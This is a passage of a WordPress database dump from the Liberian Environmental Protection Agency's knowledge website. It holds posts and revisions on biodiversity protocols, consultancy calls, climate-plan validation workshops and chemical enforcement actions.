13:51:08','2021-04-12 13:51:08','',3664,'https://ekmsliberia.info/3664-revision-v1/',0,'revision','',0),(3691,42,'2021-04-16 09:40:23','2021-04-16 09:40:23','The Cartagena Protocol on Biosafety to the Convention on Biological Diversity was adopted by the Conference of the Parties to the Convention on 29 January 2000. Liberia began party to the protocol in February 15, 2002 when she ratified and accepted the instrument and deposited same into the depositary of the convention, and in September 11, 2003 the protocol came into force in Liberia.\r\n\r\nThe National Focal Point of the protocol serves as liaison between the Government of Liberia and the Secretariat of the Protocol. The objective of the protocol is to ensure the safe handling, transport and use of living modified organisms  resulting from modern Biotechnology that may have adverse effects on biological diversity( in Liberia), taking also into account human, animals and plants health.\r\n\r\nNational Focal Point\r\n\r\nSampson K. P. Chea is the national focal point for the Cartagena Protocol on Biosafety under the Convention of Biological Diversity. He holds a Master Degree, MSc in Biochemistry and Molecular Biology from Xiamen University, Fujian Provence, People’s Republic of China; a BSc Degree in Zoology from the University of Liberia and B-Pharm Degree from the School of Pharmacy, University of Liberia. He is an Assistant Professor and a well discipline person who believes in hard-work, dedication, integrity and commitment to duty.\r\n\r\nHe was employed with the Environmental protection agency of Liberia in 2010.  His research interests involved the extraction of secondary metabolites synthesized by marine fungi, Medicinal plants and Morinda morindiodes; the isolation and characterization of novel pure compounds from marine microorganisms and Plants; and the analysis of physiochemical and bacteriological parameters of drinking water.','Cartagena Protocol on Biosafety to the Convention on Biological Diversity','','publish','closed','closed','','cartagena-protocol-on-biosafety-to-the-convention-on-biological-diversity','','','2021-04-16 09:40:23','2021-04-16 09:40:23','',0,'https://ekmsliberia.info/?post_type=mea_resource&#038;p=3691',2,'mea_resource','',0),(3692,42,'2021-04-16 09:37:10','2021-04-16 09:37:10','','cartagena','','inherit','open','closed','','cartagena-2','','','2021-04-16 09:37:10','2021-04-16 09:37:10','',3691,'https://ekmsliberia.info/wp-content/uploads/2021/04/cartagena.png',0,'attachment','image/png',0),(3693,42,'2021-04-16 09:39:09','2021-04-16 09:39:09','The Cartagena Protocol on Biosafety to the Convention on Biological Diversity was adopted by the Conference of the Parties to the Convention on 29 January 2000. Liberia began party to the protocol in February 15, 2002 when she ratified and accepted the instrument and deposited same into the depositary of the convention, and in September 11, 2003 the protocol came into force in Liberia.\r\n\r\nThe National Focal Point of the protocol serves as liaison between the Government of Liberia and the Secretariat of the Protocol. The objective of the protocol is to ensure the safe handling, transport and use of living modified organisms  resulting from modern Biotechnology that may have adverse effects on biological diversity( in Liberia), taking also into account human, animals and plants health.\r\n\r\nNational Focal Point\r\n\r\nSampson K. P. Chea is the national focal point for the Cartagena Protocol on Biosafety under the Convention of Biological Diversity. He holds a Master Degree, MSc in Biochemistry and Molecular Biology from Xiamen University, Fujian Provence, People’s Republic of China; a BSc Degree in Zoology from the University of Liberia and B-Pharm Degree from the School of Pharmacy, University of Liberia. He is an Assistant Professor and a well discipline person who believes in hard-work, dedication, integrity and commitment to duty.\r\n\r\nHe was employed with the Environmental protection agency of Liberia in 2010.  His research interests involved the extraction of secondary metabolites synthesized by marine fungi, Medicinal plants and Morinda morindiodes; the isolation and characterization of novel pure compounds from marine microorganisms and Plants; and the analysis of physiochemical and bacteriological parameters of drinking water.','Cartagena Protocol on Biosafety to the Convention on Biological Diversity','','inherit','closed','closed','','3691-revision-v1','','','2021-04-16 09:39:09','2021-04-16 09:39:09','',3691,'https://ekmsliberia.info/3691-revision-v1/',0,'revision','',0),(3694,42,'2021-04-16 09:51:23','2021-04-16 09:51:23','The Nagoya Protocol on Access and Benefit sharing was adopted by the Conference of the Parties to the Convention on Biological Diversity in the City of Nagoya, Japan on October 29, 2010. The Protocol advances the importance of the use of traditional genetic resources by both the provider and user in a legal and transparent manners and forms. It seeks obligation to support compliance with domestic legislation or regulatory requirements by providing genetic resources and contractual obligations reflected in mutually agreed terms.\r\n\r\nHowever, the objective of the Nagoya Protocol seeks for the fair and equitable sharing of the benefits arising from the utilization of genetic resources, including the appropriate access to genetic resources, by appropriate transfer of relevant technologies, taking into account the rights over those resources and technologies, and by funding, thereby contributing to the conservation of biological diversity and the sustainable use of its components.\r\n\r\nNational Focal Point\r\n\r\nFrances Browne-Seydou is the focal point for the Access and Benefit Sharing (ABS). She got employed with the EPA 2004, and has served in the following capacities/positions: Awareness Officer, Assistant Manager-Intersectoral Coordination, Assistant Manager Awareness unit and currently serving as Manager for the Department of Intersectoral Coordination. Francis professional objective is to hone her working abilities, serve her fellowmen with sincerity, loyalty, and explore possibilities for the betterment in helping to improve the Environmental standards of Liberia and around the world. She holds a Master of Public Health (MPH) from the Cuttington Graduate School and a Bachelor of Science Degree (BSc.) Biology/Chemistry from the Cuttington University.','Nagoya Protocol on Access and Benefits Sharing','','publish','closed','closed','','nagoya-protocol-on-access-and-benefits-sharing','','','2021-04-16 09:51:23','2021-04-16 09:51:23','',0,'https://ekmsliberia.info/?post_type=mea_resource&#038;p=3694',1,'mea_resource','',0),(3695,42,'2021-04-16 09:49:59','2021-04-16 09:49:59','','nagoya','','inherit','open','closed','','nagoya','','','2021-04-16 09:49:59','2021-04-16 09:49:59','',3694,'https://ekmsliberia.info/wp-content/uploads/2021/04/nagoya.png',0,'attachment','image/png',0),(3696,42,'2021-04-16 09:51:23','2021-04-16 09:51:23','The Nagoya Protocol on Access and Benefit sharing was adopted by the Conference of the Parties to the Convention on Biological Diversity in the City of Nagoya, Japan on October 29, 2010. The Protocol advances the importance of the use of traditional genetic resources by both the provider and user in a legal and transparent manners and forms. It seeks obligation to support compliance with domestic legislation or regulatory requirements by providing genetic resources and contractual obligations reflected in mutually agreed terms.\r\n\r\nHowever, the objective of the Nagoya Protocol seeks for the fair and equitable sharing of the benefits arising from the utilization of genetic resources, including the appropriate access to genetic resources, by appropriate transfer of relevant technologies, taking into account the rights over those resources and technologies, and by funding, thereby contributing to the conservation of biological diversity and the sustainable use of its components.\r\n\r\nNational Focal Point\r\n\r\nFrances Browne-Seydou is the focal point for the Access and Benefit Sharing (ABS). She got employed with the EPA 2004, and has served in the following capacities/positions: Awareness Officer, Assistant Manager-Intersectoral Coordination, Assistant Manager Awareness unit and currently serving as Manager for the Department of Intersectoral Coordination. Francis professional objective is to hone her working abilities, serve her fellowmen with sincerity, loyalty, and explore possibilities for the betterment in helping to improve the Environmental standards of Liberia and around the world. She holds a Master of Public Health (MPH) from the Cuttington Graduate School and a Bachelor of Science Degree (BSc.) Biology/Chemistry from the Cuttington University.','Nagoya Protocol on Access and Benefits Sharing','','inherit','closed','closed','','3694-revision-v1','','','2021-04-16 09:51:23','2021-04-16 09:51:23','',3694,'https://ekmsliberia.info/3694-revision-v1/',0,'revision','',0),(3698,42,'2021-04-20 15:15:30','2021-04-20 15:15:30','The EPA and the UNDP through the Cross-Cutting Capacity Development Project intends to recruit the service of a <strong>National Consultant, </strong><strong>to: Develop and validate 15-year Resource Mobilization Strategy for the sustainability of the EKMS</strong>. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/04/Consultancy-to-develop-a-15-years-Resource-Mobilization-Strategy-for-the-sustainability-of-the-Environmental-Knowledge-Management-System.docx\" target=\"_blank\" rel=\"noopener noreferrer\"><em>EPA seeks a Local Consultant to Develop and Validate and 15-year Resource Mobilization Strategy</em></a>','REFRENCE NO: EOI/CCCD/EPA-2021-003, Develop and Validate 15-year Resource Mobilization Strategy','','publish','closed','closed','','refrence-no-eoi-cccd-epa-2021-003-develop-and-validate-15-year-resource-mobilization-strategy','','','2021-08-19 08:52:42','2021-08-19 08:52:42','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3698',115,'ekms_bulletin','',0),(3699,42,'2021-04-20 15:12:51','2021-04-20 15:12:51','','Consultancy to undertake financial and economic analysis of monitoring, enforcement, and compliance of Rio Convwntions implementation','','inherit','open','closed','','consultancy-to-undertake-financial-and-economic-analysis-of-monitoring-enforcement-and-compliance-of-rio-convwntions-implementation','','','2021-04-20 15:12:51','2021-04-20 15:12:51','',0,'https://ekmsliberia.info/wp-content/uploads/2021/04/Consultancy-to-undertake-financial-and-economic-analysis-of-monitoring-enforcement-and-compliance-of-Rio-Convwntions-implementation.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(3700,42,'2021-04-20 15:13:12','2021-04-20 15:13:12','','consultancy to review the Environmental Knowledge Management System (EKMS) and procure addition subscriptions and software','','inherit','open','closed','','consultancy-to-review-the-environmental-knowledge-management-system-ekms-and-procure-addition-subscriptions-and-software','','','2021-04-20 15:13:12','2021-04-20 15:13:12','',0,'https://ekmsliberia.info/wp-content/uploads/2021/04/consultancy-to-review-the-Environmental-Knowledge-Management-System-EKMS-and-procure-addition-subscriptions-and-software.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(3701,42,'2021-04-20 15:13:15','2021-04-20 15:13:15','','Consultancy to distribute environmental awareness brochures, posters and fact sheets through outdoor drama and cultural performances','','inherit','open','closed','','consultancy-to-distribute-environmental-awareness-brochures-posters-and-fact-sheets-through-outdoor-drama-and-cultural-performances','','','2021-04-20 15:13:15','2021-04-20 15:13:15','',0,'https://ekmsliberia.info/wp-content/uploads/2021/04/Consultancy-to-distribute-environmental-awareness-brochures-posters-and-fact-sheets-through-outdoor-drama-and-cultural-performances.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(3702,42,'2021-04-20 15:13:18','2021-04-20 15:13:18','','CONSULTANCY TO DEVELOP AWARENESS MODULE FOR INSTITUTIONS APRIL 2021','','inherit','open','closed','','consultancy-to-develop-awareness-module-for-institutions-april-2021','','','2021-04-20 15:13:18','2021-04-20 15:13:18','',0,'https://ekmsliberia.info/wp-content/uploads/2021/04/CONSULTANCY-TO-DEVELOP-AWARENESS-MODULE-FOR-INSTITUTIONS-APRIL-2021.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(3703,42,'2021-04-20 15:13:22','2021-04-20 15:13:22','','Consultancy to develop a 15 years Resource Mobilization Strategy for the sustainability of the Environmental Knowledge Management System','','inherit','open','closed','','consultancy-to-develop-a-15-years-resource-mobilization-strategy-for-the-sustainability-of-the-environmental-knowledge-management-system','','','2021-04-20 15:13:22','2021-04-20 15:13:22','',0,'https://ekmsliberia.info/wp-content/uploads/2021/04/Consultancy-to-develop-a-15-years-Resource-Mobilization-Strategy-for-the-sustainability-of-the-Environmental-Knowledge-Management-System.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(3704,42,'2021-04-20 15:18:54','2021-04-20 15:18:54','The UNDP through the EPA as Implementing Entity (IE) intends to recruit the service of a <strong>National Consultant, to</strong><strong> Develop an applicable awareness module for institutions on Rio Conventions mainstreaming, monitoring and evaluation.</strong> This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/04/CONSULTANCY-TO-DEVELOP-AWARENESS-MODULE-FOR-INSTITUTIONS-APRIL-2021.docx\" target=\"_blank\" rel=\"noopener noreferrer\"><em>EPA seeks Local Consultant to Develop Awareness Module</em></a>','REFRENCE NO: TOR/CCCD/EPA-2021-005, Develop an Awareness Module for Institutions on Rio Conventions Mainstreaming','','publish','closed','closed','','refrence-no-tor-cccd-epa-2021-005-develop-an-awareness-module-for-institutions-on-rio-conventions-mainstreaming','','','2021-08-19 08:50:36','2021-08-19 08:50:36','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3704',114,'ekms_bulletin','',0),(3705,42,'2021-04-20 15:22:29','2021-04-20 15:22:29','EPA calls for Expressions of Interest (EOI) from <strong>two national cultural Dancer Groups</strong>, who have the capacities to <strong>carry out public environmental awareness through drama, cultural performances and distribution of environmental awareness posters, brochures and fact sheets</strong> as detailed in the scope of work is to motivate the general public to adopt positive attitude towards the environment. Firms having presence and experience within Liberia are highly encouraged to participate.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/04/Consultancy-to-distribute-environmental-awareness-brochures-posters-and-fact-sheets-through-outdoor-drama-and-cultural-performances.docx\" target=\"_blank\" rel=\"noopener noreferrer\"><em>EPA seeks National Cultural Dancer Groups to Carry Out Public Environmental Awareness</em></a>','REFRENCE NO: EOI/CCCD/EPA-2021-005, Distribute Brochures and Posters on the Socio-Economic Linkages Between Sustainable Land Management, Climate Change, and Biodiversity','','publish','closed','closed','','refrence-no-eoi-cccd-epa-2021-005-distribute-brochures-and-posters-on-the-socio-economic-linkages-between-sustainable-land-management-climate-change-and-biodiversity','','','2021-08-19 08:49:45','2021-08-19 08:49:45','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3705',113,'ekms_bulletin','',0),(3706,42,'2021-04-20 15:25:40','2021-04-20 15:25:40','The EPA in collaboration with the UNDP is seeking the services of a national consultant to <strong>review the Environmental Knowledge Management System, its set up, functionality and its user friendliness and procure additional subscriptions and software. </strong>The Consultant will be hired for Eighteen Days ((18 Days). He/she will report to National Project Director through the Project Manager of the CCCD Project. The Consultant shall submit the reports summarized below, for the respective period(s).\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/04/consultancy-to-review-the-Environmental-Knowledge-Management-System-EKMS-and-procure-addition-subscriptions-and-software.docx\" target=\"_blank\" rel=\"noopener noreferrer\"><em>EPA seeks Local Consultant to Review the EKMS and Procure Additional Subscriptions and Software</em></a>','REFRENCE NO: EOI/CCCD/EPA-2021-006, Review the Environmental Knowledge Management System and Procure Additional Subscriptions and Software','','publish','closed','closed','','refrence-no-eoi-cccd-epa-2021-006-review-the-environmental-knowledge-management-system-and-procure-additional-subscriptions-and-software','','','2021-08-19 08:47:31','2021-08-19 08:47:31','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3706',112,'ekms_bulletin','',0),(3707,42,'2021-04-20 15:28:45','2021-04-20 15:28:45','The EPA and the UNDP through the Cross-Cutting Capacity Development Project intends to recruit the service of a <strong>National Consultant, </strong><strong>to: undertake a financial and economic analysis of monitoring, enforcement, and compliances of Rio Conventions implementation in Liberia</strong>. This project is in line with the GEF-6 CCCD Strategy objective 1, 3, and 5 which call for countries to: a) integrate global environmental needs into management information systems and monitoring, b) integrate MEA provisions into national policy, legislative, and regulatory frameworks, and c) update NCSAs, respectively.  The goal of this project is for Liberia to make better decisions to meet and sustain global environmental obligations.  This requires the country to have the capacity to coordinate efforts, as well as best practices for integrating global environmental priorities into planning, decision-making, and reporting processes.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2021/04/Consultancy-to-undertake-financial-and-economic-analysis-of-monitoring-enforcement-and-compliance-of-Rio-Convwntions-implementation.docx\" target=\"_blank\" rel=\"noopener noreferrer\"><em>EPA seeks Local Consultant to Undertake Financial and Economic Analysis</em></a>','REFRENCE NO: TOR/CCCD/EPA-2021-004, Undertake a Financial and Economic Analysis of Monitoring, Enforcement, and Compliances of Rio Conventions Implementation','','publish','closed','closed','','refrence-no-tor-cccd-epa-2021-004-undertake-a-financial-and-economic-analysis-of-monitoring-enforcement-and-compliances-of-rio-conventions-implementation','','','2021-08-19 08:46:31','2021-08-19 08:46:31','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=3707',111,'ekms_bulletin','',0),(3710,42,'2021-04-16 11:16:12','2021-04-16 11:16:12','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) and her partners on Thursday, April 15, 2021 commenced a two-day training of national experts on submission of the budget allotment for unconditional National Determined Contribution (NDC) commitments. The training, which is taking place in Buchanan, Grand Bassa County is part of Liberia\'s NDC process. It\'s intended to train a sufficient pool of national experts to support ministries, agencies, and corporations to prepare and report on submissions for national budget allotment for unconditional aspects of the NDC.</p>\n<!-- /wp:paragraph -->','EPA and Partners Hold a Two-Day Training of National Experts April 15, 2021','','publish','open','open','','epa-and-partners-hold-a-two-day-training-of-national-experts-april-15-2021','','','2021-05-06 11:22:33','2021-05-06 11:22:33','',0,'https://ekmsliberia.info/?p=3710',175,'post','',0),(3711,42,'2021-05-06 11:20:56','2021-05-06 11:20:56','','epa','','inherit','open','closed','','epa-3','','','2021-05-06 11:20:56','2021-05-06 11:20:56','',3710,'https://ekmsliberia.info/wp-content/uploads/2021/05/epa.png',0,'attachment','image/png',0),(3712,42,'2021-05-06 11:22:30','2021-05-06 11:22:30','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) and her partners on Thursday, April 15, 2021 commenced a two-day training of national experts on submission of the budget allotment for unconditional National Determined Contribution (NDC) commitments. The training, which is taking place in Buchanan, Grand Bassa County is part of Liberia\'s NDC process. It\'s intended to train a sufficient pool of national experts to support ministries, agencies, and corporations to prepare and report on submissions for national budget allotment for unconditional aspects of the NDC.</p>\n<!-- /wp:paragraph -->','EPA and Partners Hold a Two-Day Training of National Experts April 15, 2021','','inherit','closed','closed','','3710-revision-v1','','','2021-05-06 11:22:30','2021-05-06 11:22:30','',3710,'https://ekmsliberia.info/3710-revision-v1/',0,'revision','',0),(3714,42,'2021-05-12 10:13:00','2021-05-12 10:13:00','<!-- wp:paragraph -->\n<p>Conservation International (CI) on Tuesday, 11 May 2021, donated several assorted office equipment including laptop and desktop computers, photocopier, office chairs, projector, among other items to the Ministry of Agriculture. The donation was made possible by funding provided by the Global Environment Facility (GEF) under the Capacity-building Initiative for Transparency (CBIT) Project jointly managed by the Environmental Protection Agency of Liberia.</p>\n<!-- /wp:paragraph -->','Conservation International (CI), on May 11 2021, donated several assorted office equipment to the Ministry of Agriculture.','','publish','open','open','','conservation-international-ci-on-may-11-2021-donated-several-assorted-office-equipment-to-the-ministry-of-agriculture','','','2021-05-18 10:20:05','2021-05-18 10:20:05','',0,'https://ekmsliberia.info/?p=3714',174,'post','',0),(3715,42,'2021-05-18 10:10:21','2021-05-18 10:10:21','','moa','','inherit','open','closed','','moa-2','','','2021-05-18 10:10:21','2021-05-18 10:10:21','',3714,'https://ekmsliberia.info/wp-content/uploads/2021/05/moa.png',0,'attachment','image/png',0),(3716,42,'2021-05-18 10:13:43','2021-05-18 10:13:43','<!-- wp:paragraph -->\n<p>Conservation International (CI) on Tuesday, 11 May 2021, donated several assorted office equipment including laptop and desktop computers, photocopier, office chairs, projector, among other items to the Ministry of Agriculture. The donation was made possible by funding provided by the Global Environment Facility (GEF) under the Capacity-building Initiative for Transparency (CBIT) Project jointly managed by the Environmental Protection Agency of Liberia.</p>\n<!-- /wp:paragraph -->','Conservation International (CI), on May 11 2021, donated several assorted office equipment to the Ministry of Agriculture.','','inherit','closed','closed','','3714-revision-v1','','','2021-05-18 10:13:43','2021-05-18 10:13:43','',3714,'https://ekmsliberia.info/3714-revision-v1/',0,'revision','',0),(3721,42,'2021-05-13 13:34:01','2021-05-13 13:34:01','<!-- wp:paragraph -->\n<p>With support from the NDC Partnership through Conservation International, UNDP, EU-Liberia Climate Change Alliance + Project, the Environmental Protection Agency of Liberia is holding the first of several Nationally Determined Contribution (NDC) Revision Regional Validation and Capacity Building Workshop in Buchanan, Grand Bassa County.</p>\n<!-- /wp:paragraph -->','Conservation International, UNDP, EU-Liberia Climate Change Alliance + Project, and EPA held the first NDC Revision','','publish','open','open','','conservation-international-undp-eu-liberia-climate-change-alliance-project-and-epa-held-the-first-ndc-revision','','','2021-06-22 13:40:00','2021-06-22 13:40:00','',0,'https://ekmsliberia.info/?p=3721',173,'post','',0),(3722,42,'2021-06-22 13:37:52','2021-06-22 13:37:52','','ci,epa','','inherit','open','closed','','ciepa','','','2021-06-22 13:37:52','2021-06-22 13:37:52','',3721,'https://ekmsliberia.info/wp-content/uploads/2021/06/ciepa.png',0,'attachment','image/png',0),(3723,42,'2021-06-22 13:39:58','2021-06-22 13:39:58','<!-- wp:paragraph -->\n<p>With support from the NDC Partnership through Conservation International, UNDP, EU-Liberia Climate Change Alliance + Project, the Environmental Protection Agency of Liberia is holding the first of several Nationally Determined Contribution (NDC) Revision Regional Validation and Capacity Building Workshop in Buchanan, Grand Bassa County.</p>\n<!-- /wp:paragraph -->','Conservation International, UNDP, EU-Liberia Climate Change Alliance + Project, and EPA held the first NDC Revision','','inherit','closed','closed','','3721-revision-v1','','','2021-06-22 13:39:58','2021-06-22 13:39:58','',3721,'https://ekmsliberia.info/3721-revision-v1/',0,'revision','',0),(3724,42,'2021-05-17 13:42:00','2021-05-17 13:42:00','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) on Monday 17 May 2021 quarantined a consignment of expired chemicals at RM Group.RM Group is a detergent company located on GSA Road in Paynesville, outside Monrovia. The exercise is part of an on-going nationwide chemical inventory and effluent quality monitoring process. The company initially denied EPA technicians access to it\'s facility, but were later allowed following the intervention of the Police and EPA CEO, Prof. Wilson K. Tarpeh. The team established that the company\'s operational permit has expired and that it failed to meet it\'s reporting requirement for quarterly monitoring. The company was also discharging without an effluent discharge license. It was also established that the company never had chemical registration and importation license. Meanwhile, the company has been shutdown and issued a non-compliance notice. RM Group was also served a citation for a meeting on Thursday, 20 May 2021.</p>\n<!-- /wp:paragraph -->','EPA Quarantines a Consignment of Expired Chemicals at RM Group','','publish','open','open','','epa-quarantines-a-consignment-of-expired-chemicals-at-rm-group','','','2021-06-22 13:49:58','2021-06-22 13:49:58','',0,'https://ekmsliberia.info/?p=3724',172,'post','',0),(3725,42,'2021-06-22 13:48:58','2021-06-22 13:48:58','','chemicals','','inherit','open','closed','','chemicals','','','2021-06-22 13:48:58','2021-06-22 13:48:58','',3724,'https://ekmsliberia.info/wp-content/uploads/2021/06/chemicals.png',0,'attachment','image/png',0),(3726,42,'2021-06-22 13:49:56','2021-06-22 13:49:56','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) on Monday 17 May 2021 quarantined a consignment of expired chemicals at RM Group.RM Group is a detergent company located on GSA Road in Paynesville, outside Monrovia. The exercise is part of an on-going nationwide chemical inventory and effluent quality monitoring process. The company initially denied EPA technicians access to it\'s facility, but were later allowed following the intervention of the Police and EPA CEO, Prof. Wilson K. Tarpeh. The team established that the company\'s operational permit has expired and that it failed to meet it\'s reporting requirement for quarterly monitoring. The company was also discharging without an effluent discharge license. It was also established that the company never had chemical registration and importation license. Meanwhile, the company has been shutdown and issued a non-compliance notice. RM Group was also served a citation for a meeting on Thursday, 20 May 2021.</p>\n<!-- /wp:paragraph -->','EPA Quarantines a Consignment of Expired Chemicals at RM Group','','inherit','closed','closed','','3724-revision-v1','','','2021-06-22 13:49:56','2021-06-22 13:49:56','',3724,'https://ekmsliberia.info/3724-revision-v1/',0,'revision','',0),(3727,42,'2021-05-22 13:50:37','2021-05-22 13:50:37','<!-- wp:paragraph -->\n<p>On Friday, May 21, 2021, the Conservation Unit of the Department of Compliance and Enforcement in collaboration with the Inspectorate Unit and the Department of Intersectoral had a one-day stakeholders consultation meeting with the leadership of Peace Island Community in Congo Town. The meeting was intended to create education and awareness about the maintenance of wetlands, seeks the community support and consensus for future upkeep of wetlands. During the consultative meeting key issues were discussed including the Ramsar Convention on wetlands, the Importance of wetlands and mangroves. Other issues discussed were the illegal harvesting of mangroves, back filling of wetlands and the illegal construction in wetlands. A brief discussion on the protection of wildlife in Liberia was also held.</p>\n<!-- /wp:paragraph -->','EPA\'s Conservation Unit of the Department of Compliance  & Enforcement and Department of Intersectoral Holds a One-Day Stakeholders Meeting with Peace Island Community','','publish','open','open','','epas-conservation-unit-of-the-department-of-compliance-enforcement-and-department-of-intersectoral-holds-a-one-day-stakeholders-meeting-with-peace-island-community','','','2021-06-22 13:55:05','2021-06-22 13:55:05','',0,'https://ekmsliberia.info/?p=3727',171,'post','',0),(3728,42,'2021-06-22 13:53:55','2021-06-22 13:53:55','','esia','','inherit','open','closed','','esia','','','2021-06-22 13:53:55','2021-06-22 13:53:55','',3727,'https://ekmsliberia.info/wp-content/uploads/2021/06/esia.png',0,'attachment','image/png',0),(3729,42,'2021-06-22 13:54:36','2021-06-22 13:54:36','','EPA\'s Conservation Unit of the Department of Compliance  & Enforcement and Department of Intersectoral Holds a One-Day Stakeholders Meeting with Peace Island Community','','inherit','closed','closed','','3727-revision-v1','','','2021-06-22 13:54:36','2021-06-22 13:54:36','',3727,'https://ekmsliberia.info/3727-revision-v1/',0,'revision','',0),(3730,42,'2021-06-22 13:55:03','2021-06-22 13:55:03','<!-- wp:paragraph -->\n<p>On Friday, May 21, 2021, the Conservation Unit of the Department of Compliance and Enforcement in collaboration with the Inspectorate Unit and the Department of Intersectoral had a one-day stakeholders consultation meeting with the leadership of Peace Island Community in Congo Town. The meeting was intended to create education and awareness about the maintenance of wetlands, seeks the community support and consensus for future upkeep of wetlands. During the consultative meeting key issues were discussed including the Ramsar Convention on wetlands, the Importance of wetlands and mangroves. Other issues discussed were the illegal harvesting of mangroves, back filling of wetlands and the illegal construction in wetlands. A brief discussion on the protection of wildlife in Liberia was also held.</p>\n<!-- /wp:paragraph -->','EPA\'s Conservation Unit of the Department of Compliance  & Enforcement and Department of Intersectoral Holds a One-Day Stakeholders Meeting with Peace Island Community','','inherit','closed','closed','','3727-revision-v1','','','2021-06-22 13:55:03','2021-06-22 13:55:03','',3727,'https://ekmsliberia.info/3727-revision-v1/',0,'revision','',0),(3731,42,'2021-05-24 13:59:00','2021-05-24 13:59:00','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) has made a significate gain in the fight against illicit chemical trade in Liberia, as it has confiscated another consignment of chemical illegally brought into the country. Environmental Inspectors on Sunday, May 23, 2021 confiscated 50 tins containing Formaldehyde (40%volume each weighing 34Kg). The chemicals were being transported to an unknown destination in a pick-up with plate number ‘A 4509’ when it was arrested by our inspectors at Nee Zoe Junction in Paynesville, outside Monrovia. Formaldehyde is a sensitizing agent that can cause an immune system response upon initial exposure. It is also a cancer hazard. Acute exposure is highly irritating to the eyes, nose, and throat and can make anyone exposed cough and wheeze. It can be recalled that the EPA on Saturday, May 1 2021, seized about 2.2 Metric tons of chemicals illegally imported into Liberia from Guinean. Chemicals provide enormous benefits to society and play a vital role in the economy but they may also carry risks for the environment (water, air, soil) and human health. The EPA reassures the public of its inalienable commitment to ensuring a clean, healthy and safe environment for this and succeeding generations. The Agency is calling on residents to inform it of all chemical hideouts and stockpiles across the Country to enable it maintain a Registry of all chemicals in Liberia.</p>\n<!-- /wp:paragraph -->','EPA Fights Against Illicit Chemical Trade in Liberia','','publish','open','open','','epa-fights-against-illicit-chemical-trade-in-liberia','','','2021-06-22 14:03:02','2021-06-22 14:03:02','',0,'https://ekmsliberia.info/?p=3731',170,'post','',0),(3733,42,'2021-06-22 14:01:25','2021-06-22 14:01:25','','','','inherit','open','closed','','chemical','','','2021-06-22 14:01:50','2021-06-22 14:01:50','',3731,'https://ekmsliberia.info/wp-content/uploads/2021/06/chemical.png',0,'attachment','image/png',0),(3734,42,'2021-06-22 14:02:59','2021-06-22 14:02:59','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) has made a significate gain in the fight against illicit chemical trade in Liberia, as it has confiscated another consignment of chemical illegally brought into the country. Environmental Inspectors on Sunday, May 23, 2021 confiscated 50 tins containing Formaldehyde (40%volume each weighing 34Kg). The chemicals were being transported to an unknown destination in a pick-up with plate number ‘A 4509’ when it was arrested by our inspectors at Nee Zoe Junction in Paynesville, outside Monrovia. Formaldehyde is a sensitizing agent that can cause an immune system response upon initial exposure. It is also a cancer hazard. Acute exposure is highly irritating to the eyes, nose, and throat and can make anyone exposed cough and wheeze. It can be recalled that the EPA on Saturday, May 1 2021, seized about 2.2 Metric tons of chemicals illegally imported into Liberia from Guinean. Chemicals provide enormous benefits to society and play a vital role in the economy but they may also carry risks for the environment (water, air, soil) and human health. The EPA reassures the public of its inalienable commitment to ensuring a clean, healthy and safe environment for this and succeeding generations. The Agency is calling on residents to inform it of all chemical hideouts and stockpiles across the Country to enable it maintain a Registry of all chemicals in Liberia.</p>\n<!-- /wp:paragraph -->','EPA Fights Against Illicit Chemical Trade in Liberia','','inherit','closed','closed','','3731-revision-v1','','','2021-06-22 14:02:59','2021-06-22 14:02:59','',3731,'https://ekmsliberia.info/3731-revision-v1/',0,'revision','',0),(3735,42,'2021-05-06 11:04:30','2021-05-06 11:04:30','<!-- wp:paragraph -->\n<p>Ten counties have so far validated Liberia Nationally Determined Contributions (NDCs).It\'s expected that the rest of the five counties would validate the country\' Climate Action Plan Wednesday, May 26, 2021 at third Regional Validation Meeting in Ganta, Nimba. Like the first and second Regional Validation Meeting which were held in Buchanan, Grand Bassa County and Kakata, Margibi County respectively, the third Regional Validation Meeting is expected to attract local government authorities, representatives of youth groups, women, and people living with disabilities from Nimba, Bong, Lofa, Grand Gedeh and RiverGee counties. See pictorial of the second Regional Validation Meeting, which ended over the weekend in Kakata, Margibi County.</p>\n<!-- /wp:paragraph -->','EPA Holds Second Regional Validation Meeting in Kakata, Margibi County','','publish','open','open','','epa-holds-second-regional-validation-meeting-in-kakata-margibi-county','','','2021-06-22 14:08:52','2021-06-22 